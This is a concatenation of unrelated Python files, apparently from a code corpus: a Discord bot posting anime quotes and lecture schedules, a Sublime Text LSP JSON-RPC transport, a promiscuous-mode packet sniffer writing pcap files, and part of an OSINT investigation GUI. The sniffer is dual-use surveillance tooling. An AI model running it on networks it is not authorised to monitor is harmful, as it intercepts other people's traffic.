'There was a scientific rationale for that! Because... important memories, including, but not limited to, one\'s first kiss, are stored in the hippocampus, which makes them harder to forget',
'Time is passing so quickly. Right now, I feel like complaining to Einstein. Whether time is slow or fast depends on perception. Relativity theory is so romantic. And so sad',
'I\'ve only lived 18 years, but I don\'t want to change any of them. They\'re all part of my life, even the failures',
'You\'ve pretty much figured it all out by now, right? That there is no absolute justice in this world. The opposite of justice is... another justice. Choosing the past through Time Leaps is just choosing between these justices. Can you say that your justice is correct?',
'99.9% of science is boring'
]
def scheduler_timer():
while not self.stop_event.is_set():
schedule.run_pending()
time.sleep(10)
self.scheduler_thread = threading.Thread(target=scheduler_timer)
def _create_daily_embed(self, daily_events, channel):
if not daily_events:
return
embed = discord.Embed()
day = daily_events[0]['start'].strftime('%A')
embed.add_field(name='Title', value=f'{day}\'s schedule', inline=False)
for event in daily_events:
title = event['title'].split('/')[0]
embed.add_field(name='Course', value=title, inline=True)
embed.add_field(name='Prof.', value=event['prof'], inline=True)
embed.add_field(name='Time', value=event['time'], inline=True)
embed.add_field(name='Teams', value=f'[Click!]({event["teams_link"]})', inline=False)
return embed
async def _play_audio(self, voice_channel, audio):
if not self.voice_client or not self.voice_client.is_connected():
self.voice_client = await voice_channel.connect()
else:
while self.voice_client.is_playing():
await asyncio.sleep(1)
if not self.voice_client.channel.name == voice_channel.name:
await self.voice_client.move_to(voice_channel)
self.voice_client.play(audio)
async def _wait_if_playing(self):
if self.voice_client:
while self.voice_client.is_playing():
await asyncio.sleep(1)
async def _quote_command(self, channel, args, user):
await channel.send(random.choice(self.quotes))
async def _rus_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -rus <sentence>')
return
if not user.voice:
await channel.send('You have to be in a voice channel to use this command! BAKA')
return
voice_channel = user.voice.channel
await self._wait_if_playing()
delete_if_exists('audio.mp3')
create_voice(' '.join(args[1:]), 'audio.mp3', lang='ru')
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio.mp3'))
async def _jap_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -jap <sentence>')
return
if not user.voice:
await channel.send('You have to be in a voice channel to use this command! BAKA')
return
voice_channel = user.voice.channel
await self._wait_if_playing()
delete_if_exists('audio.mp3')
create_voice(' '.join(args[1:]), 'audio.mp3')
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio.mp3'))
async def _calendar_command(self, channel, args, user):
days = 7
index = 2
if len(args) > 2:
options = ['first', 'second', 'third']
try:
index = options.index(args[2])
except ValueError:
await channel.send('Usage: -calendar [number_of_days] [first/second/third]')
return
if len(args) > 1:
try:
days = int(args[1])
except ValueError:
await channel.send('Usage: -calendar [number_of_days] [first/second/third]')
return
events = self.scrapers[index].scrape()
await channel.send(f'Lectures of the next {days} days')
now = datetime.now()
then = now + timedelta(days=days)
events = list(filter(lambda event: event['start'] < then, events))
if not events:
await channel.send('I didn\'t find any lessons')
days_list = [now + timedelta(days=i) for i in range(days)]
groups = [[e for e in events if are_same_day(e['start'], d)] for d in days_list]
for group in groups:
if group:
await channel.send(embed=self._create_daily_embed(group, channel))
async def _tj_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -tj <sentence in italian>')
return
text = translate_italian_to_japanese(' '.join(args[1:]))
await channel.send(f'Kanji: {text}\nRomaji: {japanese_to_romaji(text)}')
async def _tjsay_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -tjsay <sentence in italian>')
return
if not user.voice:
await channel.send('You have to be in a voice channel BAKA')
return
voice_channel = user.voice.channel
await self._wait_if_playing()
delete_if_exists('audio.mp3')
create_voice(translate_italian_to_japanese(' '.join(args[1:])), 'audio.mp3')
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio.mp3'))
async def _kuristina_command(self, channel, args, user):
if not user.voice:
await channel.send('You have to be in a voice channel BAKA')
return
voice_channel = user.voice.channel
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio/KURISUTINA.mp3'))
async def _tutturu_command(self, channel, args, user):
if not user.voice:
await channel.send('You have to be in a voice channel BAKA')
return
voice_channel = user.voice.channel
tutturus = ['audio/OKARIN.mp3', 'audio/DESU.mp3']
await self._play_audio(voice_channel, discord.FFmpegPCMAudio(random.choice(tutturus)))
async def on_message(self, message):
if message.author == self.user:
return
if message.content.startswith('-'):
# got a command, parse it
args = message.content.split(' ')
if args[0] == '-quote':
await self._quote_command(message.channel, args, message.author)
if args[0] == '-calendar':
await self._calendar_command(message.channel, args, message.author)
if args[0] == '-jap':
await self._jap_command(message.channel, args, message.author)
if args[0] == '-rus':
await self._rus_command(message.channel, args, message.author)
if args[0] == '-tj':
await self._tj_command(message.channel, args, message.author)
if args[0] == '-tjsay':
await self._tjsay_command(message.channel, args, message.author)
if args[0] == '-kuristina':
await self._kuristina_command(message.channel, args, message.author)
if args[0] == '-tutturu':
await self._tutturu_command(message.channel, args, message.author)
async def on_ready(self):
print('Kurisu ready uwu')
self._update_schedule()
schedule.every().day.at('00:00').do(self._update_schedule)
def _notify_lecture(self, event):
embed = discord.Embed()
title = event['title'].split('/')[0]
embed.add_field(name='Course', value=title, inline=True)
embed.add_field(name='Prof', value=event['prof'], inline=True)
embed.add_field(name='Time', value=event['time'], inline=True)
embed.add_field(name='Teams', value=f'[Click!]({event["teams_link"]})')
asyncio.run_coroutine_threadsafe(self.get_channel(self.notify_channel).send(embed=embed), self.loop)
asyncio.run_coroutine_threadsafe(self.get_channel(self.notify_channel).send('@everyone'), self.loop)
def _update_schedule(self):
print('Updating daily schedule')
schedule.clear('daily_events')
then = (datetime.now() + timedelta(days=1)).replace(hour=0, minute=0, second=0, microsecond=0)
daily_events = filter(lambda e: e['start'] < then, self.scrapers[2].scrape())
for event in daily_events:
# this should really be done using UTC timestamps tbh
hour = (event['start'] - timedelta(hours=self.hour_offset, minutes=10)).strftime('%H:%M')
schedule.every().day.at(hour).do(
self._notify_lecture, event
).tag('daily_events')
print(f'Scheduled {event["title"]} at {hour}')
def run(self, token):
print('Starting Kurisu')
self.scheduler_thread.start()
if not discord.opus.is_loaded():
discord.opus.load_opus('opus/lib/libopus.so.0')
super(KurisuBot, self).run(token)
if __name__ == '__main__':
env = environs.Env()
env.read_env()
kurisu = KurisuBot(int(env('NOTIFY_CHANNEL')), int(env('HOUR_OFFSET')))
kurisu.run(env('DISCORD_TOKEN'))
|
transports.py | from .logging import exception_log, debug
from .types import ClientConfig
from .typing import Dict, Any, Optional, IO, Protocol
from abc import ABCMeta, abstractmethod
from contextlib import closing
from queue import Queue
import json
import os
import shutil
import socket
import sublime
import subprocess
import threading
import time
import weakref
TCP_CONNECT_TIMEOUT = 5
class Transport(metaclass=ABCMeta):
@abstractmethod
def send(self, payload: Dict[str, Any]) -> None:
pass
@abstractmethod
def close(self) -> None:
pass
class TransportCallbacks(Protocol):
def on_transport_close(self, exit_code: int, exception: Optional[Exception]) -> None:
...
def on_payload(self, payload: Dict[str, Any]) -> None:
...
def on_stderr_message(self, message: str) -> None:
...
class JsonRpcTransport(Transport):
def __init__(self, name: str, process: subprocess.Popen, socket: Optional[socket.socket], reader: IO[bytes],
writer: IO[bytes], stderr: Optional[IO[bytes]], callback_object: TransportCallbacks) -> None:
self._closed = False
self._process = process
self._socket = socket
self._reader = reader
self._writer = writer
self._stderr = stderr
self._reader_thread = threading.Thread(target=self._read_loop, name='{}-reader'.format(name))
self._writer_thread = threading.Thread(target=self._write_loop, name='{}-writer'.format(name))
self._stderr_thread = threading.Thread(target=self._stderr_loop, name='{}-stderr'.format(name))
self._callback_object = weakref.ref(callback_object)
self._send_queue = Queue(0) # type: Queue[Optional[Dict[str, Any]]]
self._reader_thread.start()
self._writer_thread.start()
self._stderr_thread.start()
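# Design note: three worker threads cooperate here: the reader parses
# Content-Length-framed payloads, the writer drains _send_queue (a None
# sentinel requests shutdown), and the stderr thread forwards server
# diagnostics. callback_object is held through a weakref so the transport
# never keeps its owner alive.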
def send(self, payload: Dict[str, Any]) -> None:
self._send_queue.put_nowait(payload)
def close(self) -> None:
if not self._closed:
self._send_queue.put_nowait(None)
if self._socket:
self._socket.close()
self._closed = True
def _join_thread(self, t: threading.Thread) -> None:
if t.ident == threading.current_thread().ident:
return
try:
t.join(2)
except TimeoutError as ex:
exception_log("failed to join {} thread".format(t.name), ex)
def __del__(self) -> None:
self.close()
self._join_thread(self._writer_thread)
self._join_thread(self._reader_thread)
self._join_thread(self._stderr_thread)
def _read_loop(self) -> None:
try:
while self._reader:
line = self._reader.readline()
if not line:
break
try:
num_bytes = _content_length(line)
except ValueError:
continue
if num_bytes is None:
continue
while line and line.strip():
line = self._reader.readline()
if not line:
continue
body = self._reader.read(num_bytes)
callback_object = self._callback_object()
if callback_object:
try:
callback_object.on_payload(_decode(body))
except Exception as ex:
exception_log("Error handling payload", ex)
else:
break
except (AttributeError, BrokenPipeError):
pass
except Exception as ex:
exception_log("Unexpected exception", ex)
self._send_queue.put_nowait(None)
def _end(self, exception: Optional[Exception]) -> None:
exit_code = 0
if not exception:
try:
# Allow the process to stop itself.
exit_code = self._process.wait(1)
except (AttributeError, ProcessLookupError, subprocess.TimeoutExpired):
pass
if self._process:
try:
# The process didn't stop itself. Terminate!
self._process.kill()
# still wait for the process to die, or zombie processes might be the result
# Ignore the exit code in this case, it's going to be something non-zero because we sent SIGKILL.
self._process.wait()
except (AttributeError, ProcessLookupError):
pass
except Exception as ex:
exception = ex # TODO: Old captured exception is overwritten
callback_object = self._callback_object()
if callback_object:
callback_object.on_transport_close(exit_code, exception)
self.close()
def _write_loop(self) -> None:
exception = None # type: Optional[Exception]
try:
while self._writer:
d = self._send_queue.get()
if d is None:
break
body = _encode(d)
self._writer.writelines(("Content-Length: {}\r\n\r\n".format(len(body)).encode('ascii'), body))
self._writer.flush()
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception = ex
self._end(exception)
def _stderr_loop(self) -> None:
try:
while self._stderr:
if self._closed:
# None message already posted, just return
return
message = self._stderr.readline().decode('utf-8', 'replace')
if message == '':
break
callback_object = self._callback_object()
if callback_object:
callback_object.on_stderr_message(message.rstrip())
else:
break
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception_log('unexpected exception type in stderr loop', ex)
self._send_queue.put_nowait(None)
def create_transport(config: ClientConfig, cwd: Optional[str], window: sublime.Window,
callback_object: TransportCallbacks, variables: Dict[str, str]) -> JsonRpcTransport:
tcp_port = None # type: Optional[int]
if config.tcp_port is not None:
tcp_port = _find_free_port() if config.tcp_port == 0 else config.tcp_port
if tcp_port is not None:
variables["port"] = str(tcp_port)
args = sublime.expand_variables(config.command, variables)
args = [os.path.expanduser(arg) for arg in args]
if tcp_port is not None:
# DEPRECATED -- replace {port} with $port or ${port} in your client config
args = [a.replace('{port}', str(tcp_port)) for a in args]
env = os.environ.copy()
for var, value in config.env.items():
env[var] = sublime.expand_variables(value, variables)
if tcp_port is not None:
stdout = subprocess.DEVNULL
stdin = subprocess.DEVNULL
else:
stdout = subprocess.PIPE
stdin = subprocess.PIPE
if sublime.platform() == "windows":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW # type: ignore
executable_arg = args[0]
fname, ext = os.path.splitext(executable_arg)
if len(ext) < 1:
path_to_executable = shutil.which(executable_arg)
# what extensions should we append so CreateProcess can find it?
# node has .cmd
# dart has .bat
# python has .exe wrappers - not needed
for extension in ['.cmd', '.bat']:
if path_to_executable and path_to_executable.lower().endswith(extension):
args[0] = executable_arg + extension
break
else:
startupinfo = None
debug("starting {} in {}".format(args, cwd if cwd else os.getcwd()))
process = subprocess.Popen(
args=args,
stdin=stdin,
stdout=stdout,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
env=env,
cwd=cwd)
_subprocesses.add(process)
sock = None # type: Optional[socket.socket]
if tcp_port:
sock = _connect_tcp(tcp_port)
if sock is None:
raise RuntimeError("Failed to connect on port {}".format(config.tcp_port))
reader = sock.makefile('rwb') # type: IO[bytes]
writer = reader
else:
reader = process.stdout # type: ignore
writer = process.stdin # type: ignore
return JsonRpcTransport(config.name, process, sock, reader, writer, process.stderr, callback_object)
_subprocesses = weakref.WeakSet() # type: weakref.WeakSet[subprocess.Popen]
def kill_all_subprocesses() -> None:
global _subprocesses
subprocesses = list(_subprocesses)
for p in subprocesses:
try:
p.kill()
except Exception:
pass
for p in subprocesses:
try:
p.wait()
except Exception:
pass
def _connect_tcp(port: int) -> Optional[socket.socket]:
start_time = time.time()
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
return socket.create_connection(('localhost', port))
except ConnectionRefusedError:
pass
return None
def _find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def _encode(d: Dict[str, Any]) -> bytes:
return json.dumps(d, sort_keys=False, check_circular=False, separators=(',', ':')).encode('utf-8')
def _decode(message: bytes) -> Dict[str, Any]:
return json.loads(message.decode('utf-8'))
def _content_length(line: bytes) -> Optional[int]:
if line.startswith(b'Content-Length: '):
_, value = line.split(b'Content-Length: ')
value = value.strip()
try:
return int(value)
except ValueError as ex:
raise ValueError("Invalid Content-Length header: {}".format(value.decode('ascii'))) from ex
return None
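# Framing sketch (LSP base protocol): a message arrives as
#   Content-Length: 42\r\n
#   \r\n
#   <exactly 42 bytes of JSON>
# so _content_length(b'Content-Length: 42\r\n') returns 42, any other header
# line returns None, and a malformed length raises ValueError.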
|
networkSniffer.py | import os
import threading
import time
import netifaces
from pylibpcap import sniff
from prettytable import PrettyTable
ns_options_list = ['show', 'help', 'start', 'stop']
ns_help = 'This is a network sniffer tool designed to record network packets. \n Type \'help\' to get more ' \
'information about this tool. \n Use the following commands for network sniffing : \n start : to ' \
'start the network sniffing \n set : to set values of parameters' \
'\n stop : to end the network sniffing \n show : to display set values of parameters' \
'\n Use the following parameters with the \'start\' command :\n' \
' -o <path> : to pass the output path for file\n -t <seconds>: to stop the sniffing after given time' \
'\n -d : to display the sniffing on console\n -v : to verbose the logs\n -i : to pass the ' \
'network interface \n Use set (o/t/d/v/i) <value> to set the parameters. \n set d true i eth0'
params = {}
ns_start_params_list = ['o', 't', 'd', 'v', 'i']
ns_invalid_input_error = 'Invalid input !!!!...... Use \'help\' to get more information.'
ns_invalid_param_error = 'Invalid parameter !!!! Use \'help\' to get more information.'
ns_invalid_path_error = 'Invalid output path !!!! Use \'help\' to get more information.'
ns_invalid_interface_error = 'Invalid interface !!!! Use \'help\' to get more information.'
# Default values for the parameters
ns_verbose_status = 'false'
ns_display_status = 'false'
ns_stop_status = False
BUFFER_SIZE = 65565
file = 'network_data.pcap'
output_path = '/usr/local/bin/'
interface = 'eth0'
time_duration = 10
def ns_display():
display_table = PrettyTable(['Parameters', 'Values'])
display_table.add_row(['Interface', params['i']])
display_table.add_row(['Output Path', params['o']])
display_table.add_row(['Time <in secs>', params['t']])
display_table.add_row(['Verbose', params['v']])
display_table.add_row(['Display Sniffing', params['d']])
print(display_table)
def default_params():
global params
params['o'] = output_path
params['t'] = time_duration
params['d'] = ns_display_status
params['v'] = ns_verbose_status
params['i'] = interface
def set_params(input_str):
error_status = False
input_str = input_str[3:len(input_str)].strip()
if input_str:
param_list = input_str.split(' ')
count = 0
while count < len(param_list) and count+1 < len(param_list):
if param_list[count] in ns_start_params_list and validate_param_type(param_list[count],
param_list[count + 1]):
params[param_list[count]] = param_list[count + 1]
else:
error_status = True
count += 2
if error_status:
print(ns_invalid_input_error)
def sniffer():
default_params()
input_status = True
while input_status:
input_str = input('network-sniffer> ')
if input_str == 'exit':
input_status = False
elif input_str[0:5] == 'start' and validate_args_param(input_str):
start_sniffer()
elif input_str[0:3] == 'set':
set_params(input_str)
elif input_str == 'stop':
stop_sniffer()
elif input_str == 'help':
print(ns_help)
elif input_str == 'show':
ns_display()
elif input_str != '' and input_str not in ns_options_list:
print(ns_invalid_input_error)
else:
pass
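# Example session (a sketch; assumes an 'eth0' interface and a writable output path):
#   network-sniffer> set i eth0 t 30
#   network-sniffer> show
#   network-sniffer> start -d true
#   network-sniffer> stop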
# This module will validate the type of input params
def validate_param_type(param, value):
try:
if (param == 'i' and value in netifaces.interfaces()) or \
(param == 'o' and os.path.exists(value)) or \
(param == 't' and int(value)) or \
((param == 'v' or param == 'd') and value.lower() in ('t', 'f', 'true', 'false', '1', '0')):
return True
else:
return False
except Exception:
return False
# This module will check the validity of entered parameters
def validate_args_param(input_str):
global params
status = True
input_str = input_str[5:len(input_str)].strip()
if input_str:
param_list = input_str.split('-')
for param in param_list:
if param:
param_pair = param.strip().split(' ')
if param_pair[0] in ns_start_params_list and len(param_pair) == 2 and \
validate_param_type(param_pair[0].strip(), param_pair[1].strip()):
params[param_pair[0].strip()] = param_pair[1].strip()
else:
print(ns_invalid_param_error)
status = False
break
return status
def validate_params():
validate = True
if params['i'] not in netifaces.interfaces():
print('Interface is not valid')
validate = False
if not os.path.exists(params['o']):
print('Output path does not exist')
validate = False
if not int(params['t']):
print('Sniffing time is not valid')
validate = False
if str(params['v']).lower() not in ('t', 'f', 'true', 'false', '1', '0'):
print('Verbose state is not valid')
validate = False
if str(params['d']).lower() not in ('t', 'f', 'true', 'false', '1', '0'):
print('Display state is not valid')
validate = False
return validate
# Define a function for the thread for network sniffing
def network_sniff():
current_time = time.time()
if str(params['v']).lower() in ('t', 'true', '1'):
print("Starting Network Sniffing.....")
for plen, t, buf in sniff(params['i'], count=-1, promisc=1, out_file=params['o'] + file):
if str(params['d']).lower() in ('t', 'true', '1'):
print(buf)
if time.time() > current_time + int(params['t']) or ns_stop_status:
if str(params['v']).lower() in ('t', 'true', '1'):
print("Network Sniffing completed....")
break
# Define a function for network sniffing
def start_sniffer():
if validate_params():
try:
# lock = threading.Lock();
x = threading.Thread(target=network_sniff, args=(), daemon=True)
x.start()
print("network-sniffer>")
except Exception:
print('Network Sniffing Failed')
# Define a function to stop network sniffing
def stop_sniffer():
global ns_stop_status
ns_stop_status = True
|
pockint.py | #!/usr/bin/env python
import datetime
from threading import Thread
import tkinter as tk
from tkinter import messagebox
import tkinter.ttk as ttk
from utils import InputValidator, Database, load_icon, callback
import sys
__version__ = '1.2.0'
class CreditsTool(tk.Toplevel):
"""Opens a new window providing credits"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds credit interface."""
super().__init__(master, *args, **kwargs)
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets."""
text_credits = 'POCKINT\nversion {ver}\n copyright © {year}' \
''.format(year=datetime.datetime.now().year,
ver=__version__)
author_info = "Written with ♥ by\nNetEvert"
# create main credits label
self.lbl_info = tk.Label(self, text=text_credits,
font=('courier', 10, 'normal'))
self.lbl_author = tk.Label(self, text=author_info,
font=('courier', 10, 'normal'), cursor="hand2")
self.lbl_info.grid(row=0, column=0, sticky='w', padx=1, pady=1)
self.lbl_author.grid(row=1, column=0, sticky='w', padx=1, pady=1)
self.lbl_author.bind("<Button-1>", lambda e: callback("https://twitter.com/netevert"))
class SaveTool(tk.Toplevel):
"""Opens a window to store investigation data"""
def __init__(self, master=None, investigation_id=None, data=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
# initialize variables
self.investigation_id = investigation_id
self.data = data
# initialize database
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create explanation label
self.label = tk.Label(labelframe_1, text='Save As...')
self.label.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create data input entry widget
self.entry = tk.Entry(labelframe_1)
self.entry.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create save button
self.save_button = tk.Button(labelframe_1, text="Save", command=self.save_data)
self.save_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
# create cancel button
self.cancel_button = tk.Button(labelframe_1, text="Cancel", command=self.quit_save)
self.cancel_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
self.entry.insert(0, self.investigation_id)
def save_data(self):
"""Stores investigation data within database"""
if self.data:
try:
self.db_handler.store_investigation(self.entry.get(), self.data)
messagebox.showinfo("Success", "Successfully saved investigation")
self.quit_save()
except Exception:
messagebox.showerror("Error saving data", "Failed to save data!")
self.quit_save()
else:
messagebox.showinfo("No data", "There is no data to save")
def quit_save(self):
"""Quits the save window"""
self.db_handler.close_connection()
self.destroy()
class OpenTool(tk.Toplevel):
"""Opens a window to retrieve investigation data"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
# initialize variables
self.selection = tk.StringVar(self)
# initialize database
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create explanation label
self.label = tk.Label(labelframe_1, text='Load...')
self.label.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create data input entry widget
self.options = tk.OptionMenu(labelframe_1, self.selection, *self.db_handler.retrieve_investigation_ids(),
command=self.open_data)
self.options.pack(expand=True, fill='x', side="left", padx=2, pady=2)
self.selection.set(self.db_handler.retrieve_investigation_ids()[0])
# create save button
self.save_button = tk.Button(labelframe_1, text="Open", command=self.open_data)
self.save_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
# create cancel button
self.cancel_button = tk.Button(labelframe_1, text="Cancel", command=self.quit_open)
self.cancel_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
def open_data(self, value=None):
"""Retrieves investigation data from database"""
pockint.treeview.delete(*pockint.treeview.get_children())
pockint.id_tracker = {}
if value:
investigation_id = value
else:
investigation_id = self.selection.get()
try:
iid, data = self.db_handler.open_investigation(investigation_id)
for target in data:
for transform in data[target]:
pockint.treeview.insert(pockint.getID(target), "end", values=(transform[0], transform[1]))
pockint.investigation_id_tracker = iid
self.quit_open()
except Exception as e:
print("[*] Error: ", e)
self.quit_open()
def quit_open(self):
"""Quits the open window"""
self.db_handler.close_connection()
self.destroy()
class DeleteTool(tk.Toplevel):
"""Opens a window to retrieve investigation data"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
# initialize variables
self.selection = tk.StringVar(self)
# initialize database
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create explanation label
self.label = tk.Label(labelframe_1, text='Delete...')
self.label.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create data input entry widget
self.options = tk.OptionMenu(labelframe_1, self.selection, *self.db_handler.retrieve_investigation_ids(),
command=self.delete_data)
self.options.pack(expand=True, fill='x', side="left", padx=2, pady=2)
self.selection.set(self.db_handler.retrieve_investigation_ids()[0])
# create save button
self.save_button = tk.Button(labelframe_1, text="Delete", command=self.delete_data)
self.save_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
# create cancel button
self.cancel_button = tk.Button(labelframe_1, text="Cancel", command=self.quit)
self.cancel_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
def delete_data(self, value=None):
"""Deletes investigation data from database"""
if value:
investigation_id = value
else:
investigation_id = self.selection.get()
try:
self.db_handler.delete_investigation(investigation_id)
self.quit()
except Exception as e:
print("[*] Error: ", e)
self.quit()
def quit(self):
"""Quits the open window"""
self.db_handler.close_connection()
self.destroy()
class ApiTool(tk.Toplevel):
"""Opens a new window providing users ability to input api keys"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, text="api key manager", fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create data mining action selection drop down
self.selector = ttk.Combobox(labelframe_1, values=self.db_handler.get_apis(), state="readonly", width=50)
self.selector.current(0)
self.selector.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create data input entry widget
self.entry = tk.Entry(labelframe_1)
self.entry.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create status label
self.status = tk.Label(self, text='hit return to store api key', font=('verdana', 6, 'normal'))
self.status.pack(anchor='se')
# gui bindings
self.selector.bind("<<ComboboxSelected>>", self.grab_api_key)
self.selector.bind("<Return>", self.grab_api_key)
self.entry.bind('<Return>', self.add_api_key)
def grab_api_key(self, event=None):
"""Returns api key of selected api"""
api = self.selector.get()
_key = self.db_handler.get_api_key(api)
self.entry.delete(0, tk.END)
self.entry.insert(0, _key)
self.status['text'] = "api key retrieved"
if not _key:
self.status['text'] = "no api key exists, create one?"
def add_api_key(self, event=None):
"""Adds api key in database"""
_key = self.entry.get()
if self.entry.get():
self.db_handler.insert_api_key(self.selector.get(), self.entry.get())
self.grab_api_key()
self.status['text'] = "api key added"
if not self.entry.get():
if self.db_handler.get_api_key(self.selector.get()):
self.db_handler.insert_api_key(self.selector.get(), self.entry.get())
self.grab_api_key()
self.status['text'] = "api key deleted"
else:
self.status['text'] = "no api key provided"
def close_window(self):
"""Closes program window and database"""
self.db_handler.close_connection()
self.destroy()
class Gui(tk.Frame):
"""Main program graphical user interface"""
def __init__(self, master=None, *args, **kwargs):
super().__init__(master, *args, **kwargs)
if sys.platform == "win32":
self.icon = load_icon()
self.multi_select = tk.BooleanVar()
self.build_menu()
self.build_interface()
self.id_tracker = dict()
self.transforms_tracker = set()
self.investigation_id_tracker = ""
def build_menu(self):
"""Initializes and builds program menu bar"""
self.top = tk.Menu(self)
# create file menu
self.file = tk.Menu(self.top, tearoff=False)
self.file.add_command(label="Load investigation...", compound=tk.LEFT, underline=0, command=self.open_investigation)
self.file.add_command(label="Save investigation...", compound=tk.LEFT, underline=0, command=self.save_investigation)
self.file.add_command(label="Delete investigation...", compound=tk.LEFT, underline=0, command=self.delete_investigation)
self.file.add_separator()
self.file.add_command(label='Exit', command=self.quit_program,
underline=0)
self.top.add_cascade(label="File", menu=self.file, underline=0)
# create edit menu
self.edit = tk.Menu(self.top, tearoff=False)
self.edit.add_command(label="Clear data", compound=tk.LEFT, underline=0, command=self.clear_investigation_data)
self.edit.add_separator()
self.edit.add_command(label='API keys', command=self.manage_apis,
compound=tk.LEFT, underline=0)
self.top.add_cascade(label='Edit', menu=self.edit, underline=0)
# create run menu
self.run = tk.Menu(self.top, tearoff=False)
self.run.add_checkbutton(label="Multi-Select", onvalue=True, offvalue=False, variable=self.multi_select, command=self.config_menu)
self.run.add_command(label='Run Transform', accelerator='Ctrl+R',
command=self.run_data_mining, compound=tk.LEFT, underline=0)
self.top.add_cascade(label='Run', menu=self.run, underline=0)
# create about menu
self.info = tk.Menu(self.top, tearoff=False)
self.info.add_command(label='About ...', command=self.view_credits,
compound=tk.LEFT, underline=0)
self.top.add_cascade(label='?', menu=self.info, underline=0)
self.run.entryconfig("Run Transform", state="disabled")
def build_interface(self):
"""Builds the gui interface"""
# create search frame
frame_1 = tk.Frame()
frame_1.pack(expand=False, fill='x', anchor="n")
# create input labelframe
labelframe_1 = tk.LabelFrame(frame_1, text="input", fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create data input entry widget
self.entry = tk.Entry(labelframe_1)
self.entry.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create data mining action selection drop down
self.selector = ttk.Combobox(labelframe_1, values=[""], state="readonly")
self.selector.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create results frame
frame_2 = tk.Frame()
frame_2.pack(expand=True, fill='both', anchor="n")
# create output labelframe
labelframe_2 = tk.LabelFrame(frame_2, text="osint", padx=2, pady=2, fg='brown')
labelframe_2.pack(side="top", expand='yes', fill='both', padx=2, pady=2)
# create results treeview and associated scrollbar
self.treeview = ttk.Treeview(labelframe_2, column=('A', 'B'),
selectmode='extended', height=5)
self.treeview.pack(expand=1, fill='both', side=tk.LEFT)
self.treeview.column("#0", width=130)
self.treeview.heading("#0", text='input')
self.treeview.column("A", width=130)
self.treeview.heading("A", text='osint')
self.treeview.column("B", width=130)
self.treeview.heading("B", text="output")
self.sbar = tk.Scrollbar(labelframe_2)
self.treeview.config(yscrollcommand=self.sbar.set)
self.sbar.config(command=self.treeview.yview)
self.sbar.pack(expand='no', fill='both', side=tk.LEFT, anchor="e")
# create status label
self.status = tk.Label(frame_2, text='ready', font=('verdana', 6, 'normal'))
self.status.pack(anchor='se')
# gui bindings
self.entry.bind('<Return>', self.validate_input)
self.entry.bind('<FocusOut>', self.validate_input)
